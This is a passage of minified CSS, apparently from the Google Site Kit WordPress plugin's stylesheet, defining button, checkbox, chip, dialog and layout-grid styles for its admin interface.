.mdc-button--dropdown:focus:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-button--dropdown:hover:not(.mdc-ripple-upgraded):active::after,.googlesitekit-plugin .mdc-button--dropdown:active:not(.mdc-ripple-upgraded):active::after,.googlesitekit-plugin .mdc-button--dropdown:focus:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--dropdown:hover.mdc-ripple-upgraded,.googlesitekit-plugin .mdc-button--dropdown:active.mdc-ripple-upgraded,.googlesitekit-plugin .mdc-button--dropdown:focus.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}@media(max-width: 599px){.googlesitekit-plugin .mdc-button--dropdown{background-image:none}}@media(max-width: 599px){.googlesitekit-plugin .mdc-button--dropdown .mdc-button__label{clip:rect(1px, 1px, 1px, 1px);height:1px;overflow:hidden;position:absolute !important;width:1px}}@media(min-width: 600px){.googlesitekit-plugin .mdc-button--dropdown .mdc-button__label{max-width:220px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}}@media(min-width: 960px){.googlesitekit-plugin .mdc-button--dropdown .mdc-button__label{max-width:300px}}@media(min-width: 1280px){.googlesitekit-plugin .mdc-button--dropdown .mdc-button__label{max-width:450px}}.googlesitekit-plugin .mdc-button--inverse:not(:disabled){background-color:#161b18}.googlesitekit-plugin .mdc-button--inverse:not(:disabled){color:#fff;color:var(--mdc-theme-text-primary-on-dark, white)}.googlesitekit-plugin .mdc-button--inverse::before,.googlesitekit-plugin .mdc-button--inverse::after{background-color:#fff}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .mdc-button--inverse::before,.googlesitekit-plugin .mdc-button--inverse::after{background-color:var(--mdc-theme-text-primary-on-dark, white)}}.googlesitekit-plugin .mdc-button--inverse:hover::before{opacity:.08}.googlesitekit-plugin .mdc-button--inverse:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--inverse.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.24}.googlesitekit-plugin .mdc-button--inverse:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-button--inverse:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.24}.googlesitekit-plugin .mdc-button--inverse.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.24}.googlesitekit-plugin .mdc-button--tertiary{font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;height:auto;letter-spacing:normal;min-height:40px;padding:8px 16px}.googlesitekit-plugin .mdc-button--tertiary:not(:disabled){color:#6c726e}.googlesitekit-plugin .mdc-button--tertiary:hover{-webkit-text-decoration:none;text-decoration:none}.googlesitekit-plugin .mdc-button--tertiary:hover:not(:disabled){background-color:rgba(22,27,24,.08)}.googlesitekit-plugin .mdc-button--tertiary:hover:not(:disabled){color:#fff;color:var(--mdc-theme-text-primary-on-dark, white)}.googlesitekit-plugin .mdc-button--tertiary:hover::before,.googlesitekit-plugin .mdc-button--tertiary:hover::after{background-color:#fff}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .mdc-button--tertiary:hover::before,.googlesitekit-plugin .mdc-button--tertiary:hover::after{background-color:var(--mdc-theme-text-primary-on-dark, white)}}.googlesitekit-plugin .mdc-button--tertiary:hover:hover::before{opacity:.08}.googlesitekit-plugin .mdc-button--tertiary:hover:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--tertiary:hover.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.24}.googlesitekit-plugin .mdc-button--tertiary:hover:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-button--tertiary:hover:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.24}.googlesitekit-plugin .mdc-button--tertiary:hover.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.24}.googlesitekit-plugin .mdc-button--tertiary:hover:not(:disabled){color:#161b18}.googlesitekit-plugin .mdc-button--tertiary:active,.googlesitekit-plugin .mdc-button--tertiary:focus{outline:none}.googlesitekit-plugin .mdc-button--tertiary:active:not(:disabled),.googlesitekit-plugin .mdc-button--tertiary:focus:not(:disabled){background-color:rgba(22,27,24,.26)}.googlesitekit-plugin .mdc-button--tertiary:active:not(:disabled),.googlesitekit-plugin .mdc-button--tertiary:focus:not(:disabled){color:#fff;color:var(--mdc-theme-text-primary-on-dark, white)}.googlesitekit-plugin .mdc-button--tertiary:active::before,.googlesitekit-plugin .mdc-button--tertiary:active::after,.googlesitekit-plugin .mdc-button--tertiary:focus::before,.googlesitekit-plugin .mdc-button--tertiary:focus::after{background-color:#fff}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .mdc-button--tertiary:active::before,.googlesitekit-plugin .mdc-button--tertiary:active::after,.googlesitekit-plugin .mdc-button--tertiary:focus::before,.googlesitekit-plugin .mdc-button--tertiary:focus::after{background-color:var(--mdc-theme-text-primary-on-dark, white)}}.googlesitekit-plugin .mdc-button--tertiary:active:hover::before,.googlesitekit-plugin .mdc-button--tertiary:focus:hover::before{opacity:.08}.googlesitekit-plugin .mdc-button--tertiary:active:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--tertiary:active.mdc-ripple-upgraded--background-focused::before,.googlesitekit-plugin .mdc-button--tertiary:focus:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--tertiary:focus.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.24}.googlesitekit-plugin .mdc-button--tertiary:active:not(.mdc-ripple-upgraded)::after,.googlesitekit-plugin .mdc-button--tertiary:focus:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-button--tertiary:active:not(.mdc-ripple-upgraded):active::after,.googlesitekit-plugin .mdc-button--tertiary:focus:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.24}.googlesitekit-plugin .mdc-button--tertiary:active.mdc-ripple-upgraded,.googlesitekit-plugin .mdc-button--tertiary:focus.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.24}.googlesitekit-plugin .mdc-button--tertiary:active:not(:disabled),.googlesitekit-plugin .mdc-button--tertiary:focus:not(:disabled){color:#161b18}.googlesitekit-plugin .mdc-button--callout{font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;height:auto;letter-spacing:normal;min-height:32px;padding:6px 16px}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:not(:disabled){color:#265c3b}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover{-webkit-text-decoration:none;text-decoration:none}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover:not(:disabled){background-color:rgba(147,201,168,.6)}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover:not(:disabled){color:rgba(0,0,0,.87);color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover::after{background-color:rgba(0,0,0,.87)}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover::after{background-color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover:hover::before{opacity:.04}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover:not(:disabled){color:#265c3b}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus{outline:none}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active:not(:disabled),.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus:not(:disabled){background-color:#93c9a8}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active:not(:disabled),.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus:not(:disabled){color:rgba(0,0,0,.87);color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active::after,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus::after{background-color:rgba(0,0,0,.87)}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active::after,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus::after{background-color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active:hover::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus:hover::before{opacity:.04}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active.mdc-ripple-upgraded--background-focused::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active:not(.mdc-ripple-upgraded)::after,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active:not(.mdc-ripple-upgraded):active::after,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active.mdc-ripple-upgraded,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active:not(:disabled),.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus:not(:disabled){color:#265c3b}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:disabled{color:rgba(38,92,59,.4)}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:not(:disabled){color:#4e3300}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover{-webkit-text-decoration:none;text-decoration:none}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover:not(:disabled){background-color:rgba(225,177,85,.6)}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover:not(:disabled){color:rgba(0,0,0,.87);color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover::after{background-color:rgba(0,0,0,.87)}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover::after{background-color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover:hover::before{opacity:.04}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover:not(:disabled){color:#4e3300}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus{outline:none}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active:not(:disabled),.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus:not(:disabled){background-color:#e1b155}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active:not(:disabled),.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus:not(:disabled){color:rgba(0,0,0,.87);color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active::after,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus::after{background-color:rgba(0,0,0,.87)}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active::after,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus::after{background-color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active:hover::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus:hover::before{opacity:.04}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active.mdc-ripple-upgraded--background-focused::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active:not(.mdc-ripple-upgraded)::after,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active:not(.mdc-ripple-upgraded):active::after,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active.mdc-ripple-upgraded,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active:not(:disabled),.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus:not(:disabled){color:#4e3300}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:disabled{color:rgba(78,51,0,.4)}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:not(:disabled){color:#7a1e00}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover{-webkit-text-decoration:none;text-decoration:none}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover:not(:disabled){background-color:rgba(255,194,174,.6)}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover:not(:disabled){color:rgba(0,0,0,.87);color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover::after{background-color:rgba(0,0,0,.87)}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover::after{background-color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover:hover::before{opacity:.04}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover:not(:disabled){color:#7a1e00}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus{outline:none}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active:not(:disabled),.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus:not(:disabled){background-color:#ffc2ae}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active:not(:disabled),.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus:not(:disabled){color:rgba(0,0,0,.87);color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active::after,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus::after{background-color:rgba(0,0,0,.87)}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active::after,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus::after{background-color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active:hover::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus:hover::before{opacity:.04}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active.mdc-ripple-upgraded--background-focused::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active:not(.mdc-ripple-upgraded)::after,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active:not(.mdc-ripple-upgraded):active::after,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active.mdc-ripple-upgraded,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active:not(:disabled),.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus:not(:disabled){color:#7a1e00}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:disabled{color:rgba(122,30,0,.4)}.googlesitekit-plugin .mdc-checkbox{box-sizing:content-box;flex:0 0 14px;height:14px;padding:13px;width:14px}.googlesitekit-plugin .mdc-checkbox .mdc-checkbox__native-control:enabled:not(:checked):not(:indeterminate)~.mdc-checkbox__background{border-color:#161b18;background-color:#fff}.googlesitekit-plugin .mdc-checkbox .mdc-checkbox__native-control:enabled:checked~.mdc-checkbox__background,.googlesitekit-plugin .mdc-checkbox .mdc-checkbox__native-control:enabled:indeterminate~.mdc-checkbox__background{border-color:#161b18;background-color:#000}@keyframes mdc-checkbox-fade-in-background-0{0%{border-color:#161b18;background-color:#fff}50%{border-color:#161b18;background-color:#000}}@keyframes mdc-checkbox-fade-out-background-0{0%,80%{border-color:#161b18;background-color:#000}100%{border-color:#161b18;background-color:#fff}}.googlesitekit-plugin .mdc-checkbox.mdc-checkbox--anim-unchecked-checked .mdc-checkbox__native-control:enabled~.mdc-checkbox__background,.googlesitekit-plugin .mdc-checkbox.mdc-checkbox--anim-unchecked-indeterminate .mdc-checkbox__native-control:enabled~.mdc-checkbox__background{animation-name:mdc-checkbox-fade-in-background-0}.googlesitekit-plugin .mdc-checkbox.mdc-checkbox--anim-checked-unchecked .mdc-checkbox__native-control:enabled~.mdc-checkbox__background,.googlesitekit-plugin .mdc-checkbox.mdc-checkbox--anim-indeterminate-unchecked .mdc-checkbox__native-control:enabled~.mdc-checkbox__background{animation-name:mdc-checkbox-fade-out-background-0}.googlesitekit-plugin .mdc-checkbox .mdc-checkbox__checkmark{color:#fff}.googlesitekit-plugin .mdc-checkbox .mdc-checkbox__mixedmark{border-color:#fff}.googlesitekit-plugin .mdc-checkbox .mdc-checkbox__background::before{background-color:#265c3b}.googlesitekit-plugin .mdc-checkbox::before,.googlesitekit-plugin .mdc-checkbox::after{background-color:#00220d}.googlesitekit-plugin .mdc-checkbox:hover::before{background-color:rgba(0,34,13,.32);height:36px;left:2px;opacity:1;top:2px;width:36px;z-index:0}.googlesitekit-plugin .mdc-checkbox:not(.mdc-ripple-upgraded):active::after{opacity:.08}.googlesitekit-plugin .mdc-checkbox .mdc-checkbox__background{background-color:transparent;left:11px;top:11px}.googlesitekit-plugin .mdc-checkbox .mdc-checkbox__background .mdc-checkbox__checkmark{height:9px;left:1px;top:2px;width:12px}.googlesitekit-plugin .mdc-checkbox .mdc-checkbox__background .mdc-checkbox__checkmark-path{stroke-width:2px}.googlesitekit-plugin .mdc-checkbox .mdc-checkbox__background::before{background-color:transparent;border:2px solid #000;height:36px;left:-11px;top:-11px;transform:scale(1);width:36px}.googlesitekit-plugin .mdc-checkbox .mdc-checkbox__native-control{appearance:none;background:transparent;border:none;border-radius:0;box-shadow:none;clear:none;color:#161b18;cursor:inherit;display:block;height:100%;line-height:normal;margin:0;min-width:auto;opacity:0;outline:0;padding:0;text-align:center;transition:none;vertical-align:middle;width:100%;z-index:1}.googlesitekit-plugin .mdc-checkbox .mdc-checkbox__native-control:focus~.mdc-checkbox__background::before{opacity:1}.googlesitekit-plugin .mdc-checkbox .mdc-checkbox__native-control:enabled:not(:checked)~.mdc-checkbox__background,.googlesitekit-plugin .mdc-checkbox .mdc-checkbox__native-control:checked:enabled~.mdc-checkbox__background{border-color:#000}.googlesitekit-plugin .mdc-checkbox .mdc-checkbox__native-control[disabled]:not(:checked)~.mdc-checkbox__background{border-color:rgba(3,14,7,.32)}.googlesitekit-plugin .mdc-checkbox .mdc-checkbox__native-control[disabled]:checked~.mdc-checkbox__background{background-color:rgba(8,42,65,.08);border-color:transparent}.googlesitekit-plugin .mdc-checkbox .mdc-checkbox__native-control[disabled]:checked~.mdc-checkbox__background .mdc-checkbox__checkmark-path{stroke:rgba(3,14,7,.32)}.googlesitekit-plugin .mdc-checkbox .mdc-checkbox__native-control:enabled:not(:checked):not(:indeterminate)~.mdc-checkbox__background{background-color:transparent}.googlesitekit-plugin .mdc-checkbox.mdc-checkbox--align-left{margin-left:-11px}.googlesitekit-plugin .mdc-checkbox+.mdc-checkbox__content{padding-left:4px}.googlesitekit-plugin .mdc-checkbox__label-wrapper{align-items:center;column-gap:10px;display:flex}.googlesitekit-plugin .mdc-checkbox__label-wrapper .googlesitekit-badge{margin-left:0}.googlesitekit-plugin .mdc-chip{border-radius:100px;font-weight:500;height:auto;padding:8px 12px}@media(min-width: 783px){.googlesitekit-plugin .mdc-chip{font-size:16px;letter-spacing:.5px;margin:4px 16px;padding:12px 16px}}.googlesitekit-plugin .mdc-dialog{z-index:10000}.googlesitekit-plugin .mdc-dialog .mdc-dialog__surface{border-radius:8px;box-shadow:0 10px 40px 0 rgba(0,0,0,.35);max-width:76vw;padding:24px}@media(min-width: 600px){.googlesitekit-plugin .mdc-dialog .mdc-dialog__surface{max-width:478px;padding:36px}}@media(min-width: 960px){.googlesitekit-plugin .mdc-dialog .mdc-dialog__surface{max-width:590px}}.googlesitekit-plugin .mdc-dialog .mdc-dialog__lead,.googlesitekit-plugin .mdc-dialog .mdc-dialog__title{color:#161b18}.googlesitekit-plugin .mdc-dialog .mdc-dialog__title{align-items:flex-start;column-gap:9px;display:flex;flex-direction:column;font-size:22px;letter-spacing:0;padding:0 0 4px}@media(min-width: 600px){.googlesitekit-plugin .mdc-dialog .mdc-dialog__title{align-items:center;flex-direction:row;padding:0 0 14px}}.googlesitekit-plugin .mdc-dialog .mdc-dialog__title::before{display:none}.googlesitekit-plugin .mdc-dialog .mdc-dialog__title svg{color:#ac4220;margin-bottom:4px}@media(min-width: 600px){.googlesitekit-plugin .mdc-dialog .mdc-dialog__title svg{margin-bottom:0}}.googlesitekit-plugin .mdc-dialog .mdc-dialog__lead{font-size:14px;font-weight:500;line-height:1.43;margin:0;max-width:430px}.googlesitekit-plugin .mdc-dialog .mdc-dialog__content{color:#161b18;font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;letter-spacing:normal;padding:0}.googlesitekit-plugin .mdc-dialog .mdc-dialog__note{font-size:12px;letter-spacing:.2px;line-height:1.33;margin:1em 0}.googlesitekit-plugin .mdc-dialog .mdc-dialog__note strong{font-weight:500}.googlesitekit-plugin .mdc-dialog .mdc-dialog__provides{overflow:initial;padding:8px 0}.googlesitekit-plugin .mdc-dialog .mdc-list:first-child:last-child{padding:0}.googlesitekit-plugin .mdc-dialog .mdc-list.mdc-list--underlined .mdc-list-item,.googlesitekit-plugin .mdc-dialog .mdc-list.mdc-list--underlined .googlesitekit-view-only-menu .googlesitekit-view-only-menu__list-item,.googlesitekit-plugin .googlesitekit-view-only-menu .mdc-dialog .mdc-list.mdc-list--underlined .googlesitekit-view-only-menu__list-item{font-size:14px;height:unset;letter-spacing:.2px;line-height:1.33;min-height:32px;padding:6px 0 6px 10px}.googlesitekit-plugin .mdc-dialog .mdc-list.mdc-list--underlined .mdc-list-item::before,.googlesitekit-plugin .mdc-dialog .mdc-list.mdc-list--underlined .googlesitekit-view-only-menu .googlesitekit-view-only-menu__list-item::before,.googlesitekit-plugin .googlesitekit-view-only-menu .mdc-dialog .mdc-list.mdc-list--underlined .googlesitekit-view-only-menu__list-item::before{background-color:#161b18;border-radius:50%;content:" ";height:4px;left:0;position:absolute;top:14.3px;width:4px}.googlesitekit-plugin .mdc-dialog .mdc-dialog__actions{column-gap:10px;margin:2em 0 0;min-height:40px;padding:0}@media(min-width: 600px){.googlesitekit-plugin .mdc-dialog.googlesitekit-dialog-md .mdc-dialog__surface{max-width:441px}}@media(min-width: 600px){.googlesitekit-plugin .mdc-dialog.googlesitekit-dialog-sm .mdc-dialog__surface{max-width:402px}}.googlesitekit-plugin .mdc-dialog.googlesitekit-settings-module__confirm-disconnect-modal .mdc-list-item__text{white-space:normal}.googlesitekit-plugin .mdc-dialog.googlesitekit-settings-module__confirm-disconnect-modal .mdc-dialog__title{align-items:flex-start}.googlesitekit-plugin .mdc-dialog.googlesitekit-settings-module__confirm-disconnect-modal .mdc-list-item:last-child,.googlesitekit-plugin .mdc-dialog.googlesitekit-settings-module__confirm-disconnect-modal .googlesitekit-view-only-menu .googlesitekit-view-only-menu__list-item:last-child,.googlesitekit-plugin .googlesitekit-view-only-menu .mdc-dialog.googlesitekit-settings-module__confirm-disconnect-modal .googlesitekit-view-only-menu__list-item:last-child{border-bottom:0}.googlesitekit-plugin .mdc-floating-label{vertical-align:initial}.googlesitekit-plugin .mdc-form-field{color:#161b18}.googlesitekit-plugin .mdc-layout-grid+.mdc-layout-grid{padding-top:0}.googlesitekit-plugin .mdc-layout-grid--collapsed{padding:0}.googlesitekit-plugin .mdc-layout-grid--collapsed .mdc-layout-grid__inner{grid-gap:0}.googlesitekit-plugin .mdc-layout-grid--fill 